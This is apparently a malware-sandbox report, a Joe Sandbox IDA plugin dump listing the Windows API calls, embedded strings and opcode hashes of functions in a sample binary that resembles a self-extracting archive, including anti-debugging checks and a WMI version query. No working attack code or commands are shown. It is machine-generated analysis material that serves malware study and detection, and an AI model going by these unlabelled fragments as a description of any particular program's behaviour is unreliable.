                                                                          • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                          • API String ID: 3983180755-3508440684
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: __floor_pentium4
                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                          • API String ID: 4168288129-2761157908
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: H_prolog_swprintf
                                                                          • String ID: CMT$h%u$hc%u
                                                                          • API String ID: 146138363-3282847064
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F02874
                                                                          • _strlen.LIBCMT ref: 00F02E3F
                                                                            • Part of subcall function 00F102BA: __EH_prolog.LIBCMT ref: 00F102BF
                                                                            • Part of subcall function 00F11B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00F0BAE9,00000000,?,?,?,0001045C), ref: 00F11BA0
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F02F91
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                          • String ID: CMT
                                                                          • API String ID: 1206968400-2756464174
                                                                          APIs
                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00F1F844
                                                                          • IsDebuggerPresent.KERNEL32 ref: 00F1F910
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F1F930
                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00F1F93A
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                          • String ID:
                                                                          • API String ID: 254469556-0
                                                                          APIs
                                                                          • VirtualQuery.KERNEL32(80000000,00F1E5E8,0000001C,00F1E7DD,00000000,?,?,?,?,?,?,?,00F1E5E8,00000004,00F61CEC,00F1E86D), ref: 00F1E6B4
                                                                          • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00F1E5E8,00000004,00F61CEC,00F1E86D), ref: 00F1E6CF
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: InfoQuerySystemVirtual
                                                                          • String ID: D
                                                                          • API String ID: 401686933-2746444292
                                                                          APIs
                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00F28FB5
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00F28FBF
                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00F28FCC
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                          • String ID:
                                                                          • API String ID: 3906539128-0
                                                                          APIs
                                                                          • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00F1AF35
                                                                          • GetNumberFormatW.KERNEL32(00000400,00000000,?,00F3E72C,?,?), ref: 00F1AF84
                                                                          Similarity
                                                                          • API ID: FormatInfoLocaleNumber
                                                                          • String ID:
                                                                          • API String ID: 2169056816-0
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00F06DDF,00000000,00000400), ref: 00F06C74
                                                                          • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00F06C95
                                                                          Similarity
                                                                          • API ID: ErrorFormatLastMessage
                                                                          • String ID:
                                                                          • API String ID: 3479602957-0
                                                                          APIs
                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00F319EF,?,?,00000008,?,?,00F3168F,00000000), ref: 00F31C21
                                                                          Similarity
                                                                          • API ID: ExceptionRaise
                                                                          • String ID:
                                                                          • API String ID: 3997070919-0
                                                                          APIs
                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F1F66A
                                                                          Similarity
                                                                          • API ID: FeaturePresentProcessor
                                                                          • String ID:
                                                                          • API String ID: 2325560087-0
                                                                          APIs
                                                                          • GetVersionExW.KERNEL32(?), ref: 00F0B16B
                                                                          Similarity
                                                                          • API ID: Version
                                                                          • String ID:
                                                                          • API String ID: 1889659487-0
                                                                          Strings
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: gj
                                                                          • API String ID: 0-4203073231
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00F1F3A5), ref: 00F1F9DA
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: HeapProcess
                                                                          • String ID:
                                                                          • API String ID: 54951025-0
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID:
                                                                          • API String ID: 3519838083-0
                                                                          APIs
                                                                          • _swprintf.LIBCMT ref: 00F0E30E
                                                                            • Part of subcall function 00F04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F040A5
                                                                            • Part of subcall function 00F11DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00F41030,00000200,00F0D928,00000000,?,00000050,00F41030), ref: 00F11DC4
                                                                          • _strlen.LIBCMT ref: 00F0E32F
                                                                          • SetDlgItemTextW.USER32(?,00F3E274,?), ref: 00F0E38F
                                                                          • GetWindowRect.USER32(?,?), ref: 00F0E3C9
                                                                          • GetClientRect.USER32(?,?), ref: 00F0E3D5
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00F0E475
                                                                          • GetWindowRect.USER32(?,?), ref: 00F0E4A2
                                                                          • SetWindowTextW.USER32(?,?), ref: 00F0E4DB
                                                                          • GetSystemMetrics.USER32(00000008), ref: 00F0E4E3
                                                                          • GetWindow.USER32(?,00000005), ref: 00F0E4EE
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00F0E51B
                                                                          • GetWindow.USER32(00000000,00000002), ref: 00F0E58D
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                          • String ID: $%s:$CAPTION$d
                                                                          • API String ID: 2407758923-2512411981
                                                                          APIs
                                                                          • ___free_lconv_mon.LIBCMT ref: 00F2CB66
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C71E
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C730
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C742
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C754
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C766
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C778
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C78A
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C79C
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C7AE
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C7C0
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C7D2
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C7E4
                                                                            • Part of subcall function 00F2C701: _free.LIBCMT ref: 00F2C7F6
                                                                          • _free.LIBCMT ref: 00F2CB5B
                                                                            • Part of subcall function 00F28DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00F2C896,?,00000000,?,00000000,?,00F2C8BD,?,00000007,?,?,00F2CCBA,?), ref: 00F28DE2
                                                                            • Part of subcall function 00F28DCC: GetLastError.KERNEL32(?,?,00F2C896,?,00000000,?,00000000,?,00F2C8BD,?,00000007,?,?,00F2CCBA,?,?), ref: 00F28DF4
                                                                          • _free.LIBCMT ref: 00F2CB7D
                                                                          • _free.LIBCMT ref: 00F2CB92
                                                                          • _free.LIBCMT ref: 00F2CB9D
                                                                          • _free.LIBCMT ref: 00F2CBBF
                                                                          • _free.LIBCMT ref: 00F2CBD2
                                                                          • _free.LIBCMT ref: 00F2CBE0
                                                                          • _free.LIBCMT ref: 00F2CBEB
                                                                          • _free.LIBCMT ref: 00F2CC23
                                                                          • _free.LIBCMT ref: 00F2CC2A
                                                                          • _free.LIBCMT ref: 00F2CC47
                                                                          • _free.LIBCMT ref: 00F2CC5F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                          • String ID:
                                                                          • API String ID: 161543041-0
                                                                          • Opcode ID: ccc816b1270713d50a3a2bb78b823ca5c6fb55c89a2d80c4c2993e8a01ba2231
                                                                          • Instruction ID: b9c0e2aa097345a26a507d9dc4b83c2e0a139eee91418093380a538d8441d72c
                                                                          • Opcode Fuzzy Hash: ccc816b1270713d50a3a2bb78b823ca5c6fb55c89a2d80c4c2993e8a01ba2231
                                                                          • Instruction Fuzzy Hash: B1315031A013259FEB20AA39FC46B5A77E9EF50360F504819E548D71A2DF39EC46EB90
                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 00F19736
                                                                          • _wcslen.LIBCMT ref: 00F197D6
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00F197E5
                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00F19806
                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00F1982D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                          • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                          • API String ID: 1777411235-4209811716
                                                                          • Opcode ID: 2fbe4c7df994777caa48b8252d4658687284980c893d389800f380a50f0489f6
                                                                          • Instruction ID: 4e4fc07b1919736e63a3896d1b4a5d97ee7ae6cf2775202823ba991d303b4d87
                                                                          • Opcode Fuzzy Hash: 2fbe4c7df994777caa48b8252d4658687284980c893d389800f380a50f0489f6
                                                                          • Instruction Fuzzy Hash: B2312E3290C7117AE725AF249C06F9FBB989F42730F14011DF501961D1EBA8E949A3E6
                                                                          APIs
                                                                          • GetWindow.USER32(?,00000005), ref: 00F1D6C1
                                                                          • GetClassNameW.USER32(00000000,?,00000800), ref: 00F1D6ED
                                                                            • Part of subcall function 00F11FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00F0C116,00000000,.exe,?,?,00000800,?,?,?,00F18E3C), ref: 00F11FD1
                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00F1D709
                                                                          • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00F1D720
                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00F1D734
                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00F1D75D
                                                                          • DeleteObject.GDI32(00000000), ref: 00F1D764
                                                                          • GetWindow.USER32(00000000,00000002), ref: 00F1D76D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                          • String ID: STATIC
                                                                          • API String ID: 3820355801-1882779555
                                                                          • Opcode ID: 03b28a16175747d88dec6b67ec86fcb31bbf388588c5928fb5d21bb5aaf64159
                                                                          • Instruction ID: 3870d6bfb6f6c1c5a85ba94419f732bb7ea7aefe4e98af17613db1778000079a
                                                                          • Opcode Fuzzy Hash: 03b28a16175747d88dec6b67ec86fcb31bbf388588c5928fb5d21bb5aaf64159
                                                                          • Instruction Fuzzy Hash: D81106729053147BE6216B709C4AFEF7A6CAF44721F004120FA61A20D1DAB8CE89B6B5
                                                                          APIs
                                                                          • _free.LIBCMT ref: 00F29705
                                                                            • Part of subcall function 00F28DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00F2C896,?,00000000,?,00000000,?,00F2C8BD,?,00000007,?,?,00F2CCBA,?), ref: 00F28DE2
                                                                            • Part of subcall function 00F28DCC: GetLastError.KERNEL32(?,?,00F2C896,?,00000000,?,00000000,?,00F2C8BD,?,00000007,?,?,00F2CCBA,?,?), ref: 00F28DF4
                                                                          • _free.LIBCMT ref: 00F29711
                                                                          • _free.LIBCMT ref: 00F2971C
                                                                          • _free.LIBCMT ref: 00F29727
                                                                          • _free.LIBCMT ref: 00F29732
                                                                          • _free.LIBCMT ref: 00F2973D
                                                                          • _free.LIBCMT ref: 00F29748
                                                                          • _free.LIBCMT ref: 00F29753
                                                                          • _free.LIBCMT ref: 00F2975E
                                                                          • _free.LIBCMT ref: 00F2976C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                          • String ID:
                                                                          • API String ID: 776569668-0
                                                                          • Opcode ID: ee7cbb7d57baf4d35d420e56bc98e1c4912f93ec3ad40d5fefb39719d3e59a11
                                                                          • Instruction ID: d3f85a948bd6e1e8bf6d35177f46d5efffc7dd321a1a604afbf06f9b7c3bf434
                                                                          • Opcode Fuzzy Hash: ee7cbb7d57baf4d35d420e56bc98e1c4912f93ec3ad40d5fefb39719d3e59a11
                                                                          • Instruction Fuzzy Hash: 0111D476512019BFDB01EF54EC42CD93BB5EF14390B9158A0FA088F272DE36DA56AB84
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 322700389-393685449
                                                                          • Opcode ID: 8769ccc2a840ea99523bf56cc9bfff4d316d17d9f3ed7a0b6fdd9efafec982d7
                                                                          • Instruction ID: c272a06fb76da40351575c080668cd80bdb9bb9a7ba68eace5540494dfa776ff
                                                                          • Opcode Fuzzy Hash: 8769ccc2a840ea99523bf56cc9bfff4d316d17d9f3ed7a0b6fdd9efafec982d7
                                                                          • Instruction Fuzzy Hash: 27B16CB1D00229EFCF25DFA4E9819AEBBB5FF04320F144159E8016B216D739DA61EF91
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F06FAA
                                                                          • _wcslen.LIBCMT ref: 00F07013
                                                                          • _wcslen.LIBCMT ref: 00F07084
                                                                            • Part of subcall function 00F07A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00F07AAB
                                                                            • Part of subcall function 00F07A9C: GetLastError.KERNEL32 ref: 00F07AF1
                                                                            • Part of subcall function 00F07A9C: CloseHandle.KERNEL32(?), ref: 00F07B00
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                          • API String ID: 3122303884-3508440684
                                                                          • Opcode ID: 2dd1807089d33b675ffb4b2267f9eba337a47b6bd5fa4206ec7d3870844c4bdb
                                                                          • Instruction ID: 23cbd276e0f7bd9b9f333dd0687f8e6c6047c50af748b4d3fb7d9919b6e5d64f
                                                                          • Opcode Fuzzy Hash: 2dd1807089d33b675ffb4b2267f9eba337a47b6bd5fa4206ec7d3870844c4bdb
                                                                          • Instruction Fuzzy Hash: FB41E4B1D08744AAEF20F7749C82FEE776C9F04324F004595FA45A61C2D778BA88B761
                                                                          APIs
                                                                            • Part of subcall function 00F01316: GetDlgItem.USER32(00000000,00003021), ref: 00F0135A
                                                                            • Part of subcall function 00F01316: SetWindowTextW.USER32(00000000,00F335F4), ref: 00F01370
                                                                          • EndDialog.USER32(?,00000001), ref: 00F1B610
                                                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 00F1B637
                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00F1B650
                                                                          • SetWindowTextW.USER32(?,?), ref: 00F1B661
                                                                          • GetDlgItem.USER32(?,00000065), ref: 00F1B66A
                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00F1B67E
                                                                          • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00F1B694
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Item$TextWindow$Dialog
                                                                          • String ID: LICENSEDLG
                                                                          • API String ID: 3214253823-2177901306
                                                                          • Opcode ID: 622cd6d5a148c104d13d9ed5202f29d4ea7053f8f9b1076f15411e484401da25
                                                                          • Instruction ID: a6ef0dfdd6b06457418c884fc95288bb8f68f788e97d6ade4a8833ec5de1d21b
                                                                          • Opcode Fuzzy Hash: 622cd6d5a148c104d13d9ed5202f29d4ea7053f8f9b1076f15411e484401da25
                                                                          • Instruction Fuzzy Hash: 9A21E732A0421CFBD211AF65ED4DFBB3B7CEB57B55F010054FA01920A0CB969A45B631
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,B62175CD,00000001,00000000,00000000,?,?,00F0AF6C,ROOT\CIMV2), ref: 00F1FD99
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00F0AF6C,ROOT\CIMV2), ref: 00F1FE14
                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00F1FE1F
                                                                          • _com_issue_error.COMSUPP ref: 00F1FE48
                                                                          • _com_issue_error.COMSUPP ref: 00F1FE52
                                                                          • GetLastError.KERNEL32(80070057,B62175CD,00000001,00000000,00000000,?,?,00F0AF6C,ROOT\CIMV2), ref: 00F1FE57
                                                                          • _com_issue_error.COMSUPP ref: 00F1FE6A
                                                                          • GetLastError.KERNEL32(00000000,?,?,00F0AF6C,ROOT\CIMV2), ref: 00F1FE80
                                                                          • _com_issue_error.COMSUPP ref: 00F1FE93
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                          • String ID:
                                                                          • API String ID: 1353541977-0
                                                                          • Opcode ID: 39c22829a177aa9280dc6d1b5f7cc4edcf53b8bb5c110a553fe64f7eadce2e47
                                                                          • Instruction ID: c6944676e074a2e5c6491aaee8a0603ec527195909664c728519165da2d2a382
                                                                          • Opcode Fuzzy Hash: 39c22829a177aa9280dc6d1b5f7cc4edcf53b8bb5c110a553fe64f7eadce2e47
                                                                          • Instruction Fuzzy Hash: C341EAB1E00219ABC710DF64DC45BEFBBA9EB44730F104239F905E7291D7399988ABE5
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                          • API String ID: 3519838083-3505469590
                                                                          • Opcode ID: afc07c81f120f4db1f43386d08a9bc67d9e2b7a3e16ced4f8a5e2f79640f947f
                                                                          • Instruction ID: 69a73739c7544e8e96517799942e2f8fb45a39efaf658a14a70778f9fb9f2b59
                                                                          • Opcode Fuzzy Hash: afc07c81f120f4db1f43386d08a9bc67d9e2b7a3e16ced4f8a5e2f79640f947f
                                                                          • Instruction Fuzzy Hash: 24715A71A00219EFDF14DFA4CC95AAFB7B9FF49721B14015DE512A72A0CB30AE41EB60
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F09387
                                                                          • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00F093AA
                                                                          • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00F093C9
                                                                            • Part of subcall function 00F0C29A: _wcslen.LIBCMT ref: 00F0C2A2
                                                                            • Part of subcall function 00F11FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00F0C116,00000000,.exe,?,?,00000800,?,?,?,00F18E3C), ref: 00F11FD1
                                                                          • _swprintf.LIBCMT ref: 00F09465
                                                                            • Part of subcall function 00F04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F040A5
                                                                          • MoveFileW.KERNEL32(?,?), ref: 00F094D4
                                                                          • MoveFileW.KERNEL32(?,?), ref: 00F09514
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                          • String ID: rtmp%d
                                                                          • API String ID: 3726343395-3303766350
                                                                          • Opcode ID: 4607d6003af9c79b626900dfa70541a8b47d61d01a21908a68e0bf35823ba6c7
                                                                          • Instruction ID: 372c9461d6dc86897b38b67dc823422a4092958bd6b0f8d3caccf43a627954c1
                                                                          • Opcode Fuzzy Hash: 4607d6003af9c79b626900dfa70541a8b47d61d01a21908a68e0bf35823ba6c7
                                                                          • Instruction Fuzzy Hash: D44185B190425866CF21EB61CD45EEE737CAF40354F0448A5B649E3092FB7C8BC9BB60
                                                                          APIs
                                                                          • __aulldiv.LIBCMT ref: 00F1122E
                                                                            • Part of subcall function 00F0B146: GetVersionExW.KERNEL32(?), ref: 00F0B16B
                                                                          • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00F11251
                                                                          • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00F11263
                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00F11274
                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F11284
                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F11294
                                                                          • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00F112CF
                                                                          • __aullrem.LIBCMT ref: 00F11379
                                                                          Similarity
                                                                          • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                          • String ID:
                                                                          • API String ID: 1247370737-0
                                                                          • Opcode ID: 7439c579bef5d9fd4f229ff8944926f94f66a69c8446025e41b13d910d79ac95
                                                                          • Instruction ID: c87f1acfdb33275c0de95dc6d3df1db758ac0b924f1c46ee98b30607a36bb328
                                                                          • Opcode Fuzzy Hash: 7439c579bef5d9fd4f229ff8944926f94f66a69c8446025e41b13d910d79ac95
